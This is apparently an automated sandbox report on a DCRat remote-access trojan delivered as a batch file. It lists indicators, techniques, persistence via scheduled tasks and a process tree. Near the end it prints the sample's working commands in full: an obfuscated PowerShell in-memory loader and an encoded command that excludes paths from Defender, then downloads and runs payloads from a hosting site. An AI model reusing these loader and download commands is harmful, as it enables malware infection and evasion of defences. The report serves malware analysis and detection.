dcrat | 0bb89898ef01a14ca19b062f0bbcaee1be2bfcb113e65bb32b84108bd1009d9f

Analysis

max time kernel
39s
max time network
153s
platform
windows10-2004_x64
resource
win10v2004-20220812-en
resource tags

arch:x64arch:x86image:win10v2004-20220812-enlocale:en-usos:windows10-2004-x64system
submitted
29-08-2022 04:16

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

VertGLauncher.bat
Size

24KB
MD5

5c127a3116ab79ccc8cc74a33a3b4e30
SHA1

d8d30bc6689dc8eab0e1410eaa7320483537e2c2
SHA256

0bb89898ef01a14ca19b062f0bbcaee1be2bfcb113e65bb32b84108bd1009d9f
SHA512

7090111935c4302c87633442ba4616ac35c80fca5a3ae7cf25d8d46b29422a5a931e07b2b66ef03a0b368e9b480a54cb4b7c1b229c25cac775281d22aaaefe2d
SSDEEP

384:gM09FmyhR3aY6AggTTgMPZXffUzyJpt8RL+3GSKwl5KYABdM:g91EAgkPZXffUOJ0Ry3GSfYYABdM

Score

10^/10

dcrat discovery evasion exploit infostealer rat

Malware Config

Signatures

DcRat
DarkCrystal(DC) is a new .NET RAT active since June 2019 capable of loading additional plugins.
rat infostealer dcrat

Modifies security service 2 TTPs 5 IoCs

evasion

Modify Registry

T1112

Modify Existing Service

T1031

Processes:

reg.exe

description	ioc	process
Key deleted	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\TriggerInfo\1	reg.exe
Key deleted	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\TriggerInfo	reg.exe
Key deleted	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\Parameters	reg.exe
Key deleted	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\Security	reg.exe
Key deleted	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\TriggerInfo\0	reg.exe

Process spawned unexpected child process 30 IoCs

This typically indicates the parent process was compromised via an exploit or macro.

Processes:

schtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exe

description	pid	pid_target	process
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	3076	1388	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	4036	1388	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	4020	1388	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	4420	1388	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	4768	1388	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	2716	1388	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	3516	1388	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	1788	1388	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	516	1388	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	4160	1388	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	1660	1388	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	4304	1388	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	4868	1388	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	4908	1388	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	2040	1388	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	4700	1388	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	5036	1388	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	5092	1388	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	2144	1388	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	1680	1388	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	1048	1388	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	1284	1388	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	1948	1388	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	3596	1388	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	416	1388	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	4484	1388	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	2140	1388	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	4380	1388	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	3560	1388	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	3988	1388	schtasks.exe

DCRat payload 9 IoCs

Detects payload of DCRat, commonly dropped by NSIS installers.

rat

Processes:

resource	yara_rule
C:\Users\Admin\AppData\Local\Temp\Protector.exe	dcrat
C:\Users\Admin\AppData\Local\Temp\Protector.exe	dcrat
C:\comsavesbroker\containersavesdhcp.exe	dcrat
C:\comsavesbroker\containersavesdhcp.exe	dcrat
behavioral2/memory/2940-170-0x0000000000620000-0x00000000008D2000-memory.dmp	dcrat
C:\Recovery\WindowsRE\smss.exe	dcrat
C:\Recovery\WindowsRE\smss.exe	dcrat
behavioral2/memory/5704-268-0x0000000000860000-0x0000000000B12000-memory.dmp	dcrat
C:\Recovery\WindowsRE\smss.exe	dcrat

Blocklisted process makes network request 1 IoCs

Processes:

powershell.exe

flow pid process

15 4996 powershell.exe
Downloads MZ/PE file
Drops file in Drivers directory 1 IoCs

Processes:

AntiDebug.exe

description ioc process

File opened for modification C:\Windows\system32\drivers\etc\hosts AntiDebug.exe
Executes dropped EXE 6 IoCs

Processes:

VertGLauncher.bat.exeProtector.exeAntiDebug.execontainersavesdhcp.exeupdaterchr.exesmss.exe

pid process

4876 VertGLauncher.bat.exe
1636 Protector.exe
1292 AntiDebug.exe
2940 containersavesdhcp.exe
5428 updaterchr.exe
5704 smss.exe
Possible privilege escalation attempt 2 IoCs
exploit

Processes:

icacls.exetakeown.exe

pid process

5296 icacls.exe
5272 takeown.exe
Stops running service(s) 3 TTPs
evasion

Modify Existing Service
T1031

Impair Defenses
T1562

Service Stop
T1489

flow	pid	process
15	4996	powershell.exe

description	ioc	process
File opened for modification	C:\Windows\system32\drivers\etc\hosts	AntiDebug.exe

pid	process
5296	icacls.exe
5272	takeown.exe

Checks computer location settings 2 TTPs 5 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

Processes:

VertGLauncher.bat.exeAntiDebug.exeProtector.exeWScript.execontainersavesdhcp.exe

description	ioc	process
Key value queried	\REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000\Control Panel\International\Geo\Nation	VertGLauncher.bat.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000\Control Panel\International\Geo\Nation	AntiDebug.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000\Control Panel\International\Geo\Nation	Protector.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000\Control Panel\International\Geo\Nation	WScript.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000\Control Panel\International\Geo\Nation	containersavesdhcp.exe

Modifies file permissions 1 TTPs 2 IoCs
discovery

File and Directory Permissions Modification
T1222

Processes:

icacls.exetakeown.exe

pid process

5296 icacls.exe
5272 takeown.exe
Legitimate hosting services abused for malware hosting/C2 1 TTPs

Web Service
T1102

pid	process
5296	icacls.exe
5272	takeown.exe

Drops file in Program Files directory 11 IoCs

Processes:

containersavesdhcp.exeAntiDebug.exe

description	ioc	process
File created	C:\Program Files (x86)\Internet Explorer\de-DE\cmd.exe	containersavesdhcp.exe
File opened for modification	C:\Program Files (x86)\Internet Explorer\de-DE\cmd.exe	containersavesdhcp.exe
File created	C:\Program Files\Google\Chrome\updaterchr.exe	AntiDebug.exe
File opened for modification	C:\Program Files\Common Files\microsoft shared\VC\containersavesdhcp.exe	containersavesdhcp.exe
File created	C:\Program Files\Common Files\microsoft shared\VC\containersavesdhcp.exe	containersavesdhcp.exe
File created	C:\Program Files\Common Files\microsoft shared\VC\e54f63597e9e2d	containersavesdhcp.exe
File created	C:\Program Files (x86)\Internet Explorer\de-DE\ebf1f9fa8afd6d	containersavesdhcp.exe
File opened for modification	C:\Program Files\Common Files\microsoft shared\VC\RCXB0D7.tmp	containersavesdhcp.exe
File opened for modification	C:\Program Files (x86)\Internet Explorer\de-DE\RCXB388.tmp	containersavesdhcp.exe
File opened for modification	C:\Program Files\Google\Chrome\updaterchr.exe	AntiDebug.exe
File created	C:\Program Files\WindowsApps\Microsoft.ZuneMusic_10.19071.19011.0_neutral_split.scale-100_8wekyb3d8bbwe\Assets\AntiDebug.exe	containersavesdhcp.exe

Drops file in Windows directory 4 IoCs

Processes:

containersavesdhcp.exe

description	ioc	process
File created	C:\Windows\Resources\Ease of Access Themes\StartMenuExperienceHost.exe	containersavesdhcp.exe
File created	C:\Windows\Resources\Ease of Access Themes\55b276f4edf653	containersavesdhcp.exe
File opened for modification	C:\Windows\Resources\Ease of Access Themes\RCXB686.tmp	containersavesdhcp.exe
File opened for modification	C:\Windows\Resources\Ease of Access Themes\StartMenuExperienceHost.exe	containersavesdhcp.exe

Launches sc.exe 5 IoCs
Sc.exe is a Windows utlilty to control services on the system.

Processes:

sc.exesc.exesc.exesc.exesc.exe

pid process

1552 sc.exe
3688 sc.exe
2140 sc.exe
1892 sc.exe
4540 sc.exe
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082

pid	process
1552	sc.exe
3688	sc.exe
2140	sc.exe
1892	sc.exe
4540	sc.exe

Creates scheduled task(s) 1 TTPs 30 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence

Scheduled Task

T1053

Processes:

pid	process
4868	schtasks.exe
1660	schtasks.exe
2716	schtasks.exe
4908	schtasks.exe
5036	schtasks.exe
2144	schtasks.exe
3596	schtasks.exe
416	schtasks.exe
3560	schtasks.exe
4036	schtasks.exe
1048	schtasks.exe
4484	schtasks.exe
4380	schtasks.exe
4420	schtasks.exe
2040	schtasks.exe
5092	schtasks.exe
1680	schtasks.exe
1948	schtasks.exe
2140	schtasks.exe
4020	schtasks.exe
3516	schtasks.exe
3988	schtasks.exe
4768	schtasks.exe
1284	schtasks.exe
516	schtasks.exe
4160	schtasks.exe
4304	schtasks.exe
4700	schtasks.exe
1788	schtasks.exe
3076	schtasks.exe

Modifies registry class 2 IoCs

Processes:

Protector.execontainersavesdhcp.exe

description	ioc	process
Key created	\REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000_Classes\Local Settings	Protector.exe
Key created	\REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000_Classes\Local Settings	containersavesdhcp.exe

Modifies registry key 1 TTPs 9 IoCs

Modify Registry
T1112

Processes:

reg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exe

pid process

5256 reg.exe
5596 reg.exe
5640 reg.exe
764 reg.exe
2492 reg.exe
5208 reg.exe
5232 reg.exe
5612 reg.exe
5656 reg.exe
Runs net.exe

pid	process
5256	reg.exe
5596	reg.exe
5640	reg.exe
764	reg.exe
2492	reg.exe
5208	reg.exe
5232	reg.exe
5612	reg.exe
5656	reg.exe

Suspicious behavior: EnumeratesProcesses 58 IoCs

Processes:

VertGLauncher.bat.exepowershell.exepowershell.exepowershell.execontainersavesdhcp.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exeAntiDebug.exe

pid	process
4876	VertGLauncher.bat.exe
4876	VertGLauncher.bat.exe
4996	powershell.exe
4996	powershell.exe
100	powershell.exe
100	powershell.exe
360	powershell.exe
360	powershell.exe
2940	containersavesdhcp.exe
2940	containersavesdhcp.exe
2940	containersavesdhcp.exe
2940	containersavesdhcp.exe
2940	containersavesdhcp.exe
2940	containersavesdhcp.exe
2940	containersavesdhcp.exe
3044	powershell.exe
3044	powershell.exe
1816	powershell.exe
1816	powershell.exe
3892	powershell.exe
3892	powershell.exe
3764	powershell.exe
3764	powershell.exe
60	powershell.exe
60	powershell.exe
1700	powershell.exe
1700	powershell.exe
2396	powershell.exe
2396	powershell.exe
4260	powershell.exe
4260	powershell.exe
1464	powershell.exe
1464	powershell.exe
4776	powershell.exe
4776	powershell.exe
3796	powershell.exe
3796	powershell.exe
2300	powershell.exe
2300	powershell.exe
1660	powershell.exe
1660	powershell.exe
4420	powershell.exe
4420	powershell.exe
1816	powershell.exe
3892	powershell.exe
60	powershell.exe
1700	powershell.exe
3764	powershell.exe
2396	powershell.exe
4260	powershell.exe
1464	powershell.exe
4776	powershell.exe
3796	powershell.exe
4420	powershell.exe
2300	powershell.exe
1660	powershell.exe
1292	AntiDebug.exe
1292	AntiDebug.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

Processes:

VertGLauncher.bat.exepowershell.exepowershell.exepowershell.execontainersavesdhcp.exepowercfg.exepowershell.exepowercfg.exepowercfg.exepowercfg.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exe

description	pid	process
Token: SeDebugPrivilege	4876	VertGLauncher.bat.exe
Token: SeDebugPrivilege	4996	powershell.exe
Token: SeDebugPrivilege	100	powershell.exe
Token: SeDebugPrivilege	360	powershell.exe
Token: SeDebugPrivilege	2940	containersavesdhcp.exe
Token: SeShutdownPrivilege	4808	powercfg.exe
Token: SeCreatePagefilePrivilege	4808	powercfg.exe
Token: SeDebugPrivilege	3044	powershell.exe
Token: SeShutdownPrivilege	1792	powercfg.exe
Token: SeCreatePagefilePrivilege	1792	powercfg.exe
Token: SeShutdownPrivilege	4424	powercfg.exe
Token: SeCreatePagefilePrivilege	4424	powercfg.exe
Token: SeShutdownPrivilege	3928	powercfg.exe
Token: SeCreatePagefilePrivilege	3928	powercfg.exe
Token: SeDebugPrivilege	1816	powershell.exe
Token: SeDebugPrivilege	3892	powershell.exe
Token: SeDebugPrivilege	3764	powershell.exe
Token: SeDebugPrivilege	60	powershell.exe
Token: SeDebugPrivilege	1700	powershell.exe
Token: SeIncreaseQuotaPrivilege	3044	powershell.exe
Token: SeSecurityPrivilege	3044	powershell.exe
Token: SeTakeOwnershipPrivilege	3044	powershell.exe
Token: SeLoadDriverPrivilege	3044	powershell.exe
Token: SeSystemProfilePrivilege	3044	powershell.exe
Token: SeSystemtimePrivilege	3044	powershell.exe
Token: SeProfSingleProcessPrivilege	3044	powershell.exe
Token: SeIncBasePriorityPrivilege	3044	powershell.exe
Token: SeCreatePagefilePrivilege	3044	powershell.exe
Token: SeBackupPrivilege	3044	powershell.exe
Token: SeRestorePrivilege	3044	powershell.exe
Token: SeShutdownPrivilege	3044	powershell.exe
Token: SeDebugPrivilege	3044	powershell.exe
Token: SeSystemEnvironmentPrivilege	3044	powershell.exe
Token: SeRemoteShutdownPrivilege	3044	powershell.exe
Token: SeUndockPrivilege	3044	powershell.exe
Token: SeManageVolumePrivilege	3044	powershell.exe
Token: 33	3044	powershell.exe
Token: 34	3044	powershell.exe
Token: 35	3044	powershell.exe
Token: 36	3044	powershell.exe
Token: SeDebugPrivilege	2396	powershell.exe
Token: SeDebugPrivilege	4260	powershell.exe
Token: SeDebugPrivilege	1464	powershell.exe
Token: SeDebugPrivilege	4776	powershell.exe
Token: SeDebugPrivilege	3796	powershell.exe
Token: SeDebugPrivilege	4420	powershell.exe
Token: SeDebugPrivilege	2300	powershell.exe
Token: SeDebugPrivilege	1660	powershell.exe
Token: SeIncreaseQuotaPrivilege	3044	powershell.exe
Token: SeSecurityPrivilege	3044	powershell.exe
Token: SeTakeOwnershipPrivilege	3044	powershell.exe
Token: SeLoadDriverPrivilege	3044	powershell.exe
Token: SeSystemProfilePrivilege	3044	powershell.exe
Token: SeSystemtimePrivilege	3044	powershell.exe
Token: SeProfSingleProcessPrivilege	3044	powershell.exe
Token: SeIncBasePriorityPrivilege	3044	powershell.exe
Token: SeCreatePagefilePrivilege	3044	powershell.exe
Token: SeBackupPrivilege	3044	powershell.exe
Token: SeRestorePrivilege	3044	powershell.exe
Token: SeShutdownPrivilege	3044	powershell.exe
Token: SeDebugPrivilege	3044	powershell.exe
Token: SeSystemEnvironmentPrivilege	3044	powershell.exe
Token: SeRemoteShutdownPrivilege	3044	powershell.exe
Token: SeUndockPrivilege	3044	powershell.exe

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

cmd.exenet.exeVertGLauncher.bat.execmd.exepowershell.exeAntiDebug.exeProtector.exeWScript.execmd.execmd.execmd.execontainersavesdhcp.exe

description	pid	process	target process
PID 1680 wrote to memory of 4768	1680	cmd.exe	net.exe
PID 1680 wrote to memory of 4768	1680	cmd.exe	net.exe
PID 4768 wrote to memory of 4220	4768	net.exe	net1.exe
PID 4768 wrote to memory of 4220	4768	net.exe	net1.exe
PID 1680 wrote to memory of 4876	1680	cmd.exe	VertGLauncher.bat.exe
PID 1680 wrote to memory of 4876	1680	cmd.exe	VertGLauncher.bat.exe
PID 4876 wrote to memory of 4996	4876	VertGLauncher.bat.exe	powershell.exe
PID 4876 wrote to memory of 4996	4876	VertGLauncher.bat.exe	powershell.exe
PID 4876 wrote to memory of 4484	4876	VertGLauncher.bat.exe	cmd.exe
PID 4876 wrote to memory of 4484	4876	VertGLauncher.bat.exe	cmd.exe
PID 4484 wrote to memory of 552	4484	cmd.exe	choice.exe
PID 4484 wrote to memory of 552	4484	cmd.exe	choice.exe
PID 4996 wrote to memory of 100	4996	powershell.exe	powershell.exe
PID 4996 wrote to memory of 100	4996	powershell.exe	powershell.exe
PID 4484 wrote to memory of 3524	4484	cmd.exe	attrib.exe
PID 4484 wrote to memory of 3524	4484	cmd.exe	attrib.exe
PID 4996 wrote to memory of 1636	4996	powershell.exe	Protector.exe
PID 4996 wrote to memory of 1636	4996	powershell.exe	Protector.exe
PID 4996 wrote to memory of 1636	4996	powershell.exe	Protector.exe
PID 4996 wrote to memory of 1292	4996	powershell.exe	AntiDebug.exe
PID 4996 wrote to memory of 1292	4996	powershell.exe	AntiDebug.exe
PID 1292 wrote to memory of 360	1292	AntiDebug.exe	powershell.exe
PID 1292 wrote to memory of 360	1292	AntiDebug.exe	powershell.exe
PID 1636 wrote to memory of 616	1636	Protector.exe	WScript.exe
PID 1636 wrote to memory of 616	1636	Protector.exe	WScript.exe
PID 1636 wrote to memory of 616	1636	Protector.exe	WScript.exe
PID 616 wrote to memory of 2936	616	WScript.exe	cmd.exe
PID 616 wrote to memory of 2936	616	WScript.exe	cmd.exe
PID 616 wrote to memory of 2936	616	WScript.exe	cmd.exe
PID 2936 wrote to memory of 2940	2936	cmd.exe	containersavesdhcp.exe
PID 2936 wrote to memory of 2940	2936	cmd.exe	containersavesdhcp.exe
PID 1292 wrote to memory of 3412	1292	AntiDebug.exe	cmd.exe
PID 1292 wrote to memory of 3412	1292	AntiDebug.exe	cmd.exe
PID 1292 wrote to memory of 396	1292	AntiDebug.exe	cmd.exe
PID 1292 wrote to memory of 396	1292	AntiDebug.exe	cmd.exe
PID 1292 wrote to memory of 3044	1292	AntiDebug.exe	powershell.exe
PID 1292 wrote to memory of 3044	1292	AntiDebug.exe	powershell.exe
PID 396 wrote to memory of 4808	396	cmd.exe	powercfg.exe
PID 396 wrote to memory of 4808	396	cmd.exe	powercfg.exe
PID 3412 wrote to memory of 4540	3412	cmd.exe	sc.exe
PID 3412 wrote to memory of 4540	3412	cmd.exe	sc.exe
PID 396 wrote to memory of 1792	396	cmd.exe	powercfg.exe
PID 396 wrote to memory of 1792	396	cmd.exe	powercfg.exe
PID 3412 wrote to memory of 1552	3412	cmd.exe	sc.exe
PID 3412 wrote to memory of 1552	3412	cmd.exe	sc.exe
PID 396 wrote to memory of 4424	396	cmd.exe	powercfg.exe
PID 396 wrote to memory of 4424	396	cmd.exe	powercfg.exe
PID 3412 wrote to memory of 3688	3412	cmd.exe	sc.exe
PID 3412 wrote to memory of 3688	3412	cmd.exe	sc.exe
PID 2940 wrote to memory of 1816	2940	containersavesdhcp.exe	powershell.exe
PID 2940 wrote to memory of 1816	2940	containersavesdhcp.exe	powershell.exe
PID 2940 wrote to memory of 3892	2940	containersavesdhcp.exe	powershell.exe
PID 2940 wrote to memory of 3892	2940	containersavesdhcp.exe	powershell.exe
PID 2940 wrote to memory of 3764	2940	containersavesdhcp.exe	powershell.exe
PID 2940 wrote to memory of 3764	2940	containersavesdhcp.exe	powershell.exe
PID 2940 wrote to memory of 60	2940	containersavesdhcp.exe	powershell.exe
PID 2940 wrote to memory of 60	2940	containersavesdhcp.exe	powershell.exe
PID 2940 wrote to memory of 1700	2940	containersavesdhcp.exe	powershell.exe
PID 2940 wrote to memory of 1700	2940	containersavesdhcp.exe	powershell.exe
PID 2940 wrote to memory of 2396	2940	containersavesdhcp.exe	powershell.exe
PID 2940 wrote to memory of 2396	2940	containersavesdhcp.exe	powershell.exe
PID 396 wrote to memory of 3928	396	cmd.exe	powercfg.exe
PID 396 wrote to memory of 3928	396	cmd.exe	powercfg.exe
PID 2940 wrote to memory of 4260	2940	containersavesdhcp.exe	powershell.exe

Views/modifies file attributes 1 TTPs 1 IoCs
evasion

Hidden Files and Directories
T1158

Processes:

attrib.exe

pid process

3524 attrib.exe

pid	process
3524	attrib.exe

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\VertGLauncher.bat"
1⤵
- Suspicious use of WriteProcessMemory
PID:1680

C:\Windows\system32\net.exe
net file
2⤵
- Suspicious use of WriteProcessMemory
PID:4768

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 file
3⤵
PID:4220

C:\Users\Admin\AppData\Local\Temp\VertGLauncher.bat.exe
"VertGLauncher.bat.exe" -noprofile -windowstyle hidden -ep bypass -command $eaqcw = [System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')('C:\Users\Admin\AppData\Local\Temp\VertGLauncher.bat').Split([Environment]::NewLine);foreach ($VtoBl in $eaqcw) { if ($VtoBl.StartsWith(':: ')) { $BMjJe = $VtoBl.Substring(3); break; }; };$VGGCQ = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($BMjJe);$hbvqO = New-Object System.Security.Cryptography.AesManaged;$hbvqO.Mode = [System.Security.Cryptography.CipherMode]::CBC;$hbvqO.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$hbvqO.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('wYPqphQqHyVIeW2CaPqkTUCy/0ecJs6agKij7Q3HRY4=');$hbvqO.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('E55hmIoW8UIQx1ajzTvfAA==');$CfOAS = $hbvqO.CreateDecryptor();$VGGCQ = $CfOAS.TransformFinalBlock($VGGCQ, 0, $VGGCQ.Length);$CfOAS.Dispose();$hbvqO.Dispose();$YVjlv = New-Object System.IO.MemoryStream(, $VGGCQ);$iJFSw = New-Object System.IO.MemoryStream;$uwkaq = New-Object System.IO.Compression.GZipStream($YVjlv, [IO.Compression.CompressionMode]::Decompress);$uwkaq.CopyTo($iJFSw);$uwkaq.Dispose();$YVjlv.Dispose();$iJFSw.Dispose();$VGGCQ = $iJFSw.ToArray();$WtHIs = [System.Reflection.Assembly]::('daoL'[-1..-4] -join '')($VGGCQ);$iFZWS = $WtHIs.EntryPoint;$iFZWS.Invoke($null, (, [string[]] ('')))
2⤵
- Executes dropped EXE
- Checks computer location settings
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4876

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHEAbgBnACMAPgBTAHQAYQByAHQALQBQAHIAbwBjAGUAcwBzACAAcABvAHcAZQByAHMAaABlAGwAbAAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIAAtAEEAcgBnAHUAbQBlAG4AdABMAGkAcwB0ACAAIgBBAGQAZAAtAFQAeQBwAGUAIAAtAEEAcwBzAGUAbQBiAGwAeQBOAGEAbQBlACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsAPAAjAGQAegBiACMAPgBbAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwAuAE0AZQBzAHMAYQBnAGUAQgBvAHgAXQA6ADoAUwBoAG8AdwAoACcATgBvACAAVgBNAC8AVgBQAFMAIABhAGwAbABvAHcAZQBkACEAJwAsACcAJwAsACcATwBLACcALAAnAEUAcgByAG8AcgAnACkAPAAjAHoAcAB3ACMAPgA7ACIAOwA8ACMAbgBsAGgAIwA+ACAAQQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgADwAIwB4AGUAeAAjAD4AIAAtAEUAeABjAGwAdQBzAGkAbwBuAFAAYQB0AGgAIABAACgAJABlAG4AdgA6AFUAcwBlAHIAUAByAG8AZgBpAGwAZQAsACQAZQBuAHYAOgBTAHkAcwB0AGUAbQBEAHIAaQB2AGUAKQAgADwAIwBlAG4AdgAjAD4AIAAtAEYAbwByAGMAZQAgADwAIwB2AGYAYgAjAD4AOwAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAE4AZQB0AC4AVwBlAGIAQwBsAGkAZQBuAHQAKQAuAEQAbwB3AG4AbABvAGEAZABGAGkAbABlACgAJwBoAHQAdABwAHMAOgAvAC8AYgBpAHQAYgB1AGMAawBlAHQALgBvAHIAZwAvAGwAdQBjAGkAZgBlAHIANgAxAC8AbABhAHMAdAB0AGUAcwB0AC8AcgBhAHcALwBiADkAMgA5AGIANAAzADcAYgA3ADUAYwAwAGQAZQA0AGQANwBjADIAYQBiAGYAYwAzADYAMQA0ADAAMABjADUAZgBlADUAYwA4AGMAYQA1AC8ASwB5AHMALgBlAHgAZQAnACwAIAA8ACMAZgBxAGsAIwA+ACAAKABKAG8AaQBuAC0AUABhAHQAaAAgADwAIwBnAGYAdAAjAD4AIAAtAFAAYQB0AGgAIAAkAGUAbgB2ADoAVABlAG0AcAAgADwAIwBlAHAAZQAjAD4AIAAtAEMAaABpAGwAZABQAGEAdABoACAAJwBQAHIAbwB0AGUAYwB0AG8AcgAuAGUAeABlACcAKQApADwAIwByAGQAcgAjAD4AOwAgACgATgBlAHcALQBPAGIAagBlAGMAdAAgAFMAeQBzAHQAZQBtAC4ATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAEYAaQBsAGUAKAAnAGgAdAB0AHAAcwA6AC8ALwBiAGkAdABiAHUAYwBrAGUAdAAuAG8AcgBnAC8AbAB1AGMAaQBmAGUAcgA2ADEALwBsAGEAcwB0AHQAZQBzAHQALwByAGEAdwAvAGIAOQAyADkAYgA0ADMANwBiADcANQBjADAAZABlADQAZAA3AGMAMgBhAGIAZgBjADMANgAxADQAMAAwAGMANQBmAGUANQBjADgAYwBhADUALwBtAGkAbQBpAG0AaQAuAGUAeABlACcALAAgADwAIwBhAHQAZgAjAD4AIAAoAEoAbwBpAG4ALQBQAGEAdABoACAAPAAjAHMAagB5ACMAPgAgAC0AUABhAHQAaAAgACQAZQBuAHYAOgBUAGUAbQBwACAAPAAjAHkAbgBiACMAPgAgAC0AQwBoAGkAbABkAFAAYQB0AGgAIAAnAEEAbgB0AGkARABlAGIAdQBnAC4AZQB4AGUAJwApACkAPAAjAHAAbQBkACMAPgA7ACAAUwB0AGEAcgB0AC0AUAByAG8AYwBlAHMAcwAgAC0ARgBpAGwAZQBQAGEAdABoACAAPAAjAGsAZwB4ACMAPgAgACgASgBvAGkAbgAtAFAAYQB0AGgAIAAtAFAAYQB0AGgAIAAkAGUAbgB2ADoAVABlAG0AcAAgADwAIwB4AHYAcQAjAD4AIAAtAEMAaABpAGwAZABQAGEAdABoACAAJwBQAHIAbwB0AGUAYwB0AG8AcgAuAGUAeABlACcAKQA8ACMAcABzAGcAIwA+ADsAIABTAHQAYQByAHQALQBQAHIAbwBjAGUAcwBzACAALQBGAGkAbABlAFAAYQB0AGgAIAA8ACMAbQBuAGkAIwA+ACAAKABKAG8AaQBuAC0AUABhAHQAaAAgAC0AUABhAHQAaAAgACQAZQBuAHYAOgBUAGUAbQBwACAAPAAjAGcAeQBsACMAPgAgAC0AQwBoAGkAbABkAFAAYQB0AGgAIAAnAEEAbgB0AGkARABlAGIAdQBnAC4AZQB4AGUAJwApADwAIwBrAHcAZwAjAD4A"
3⤵
- Blocklisted process makes network request
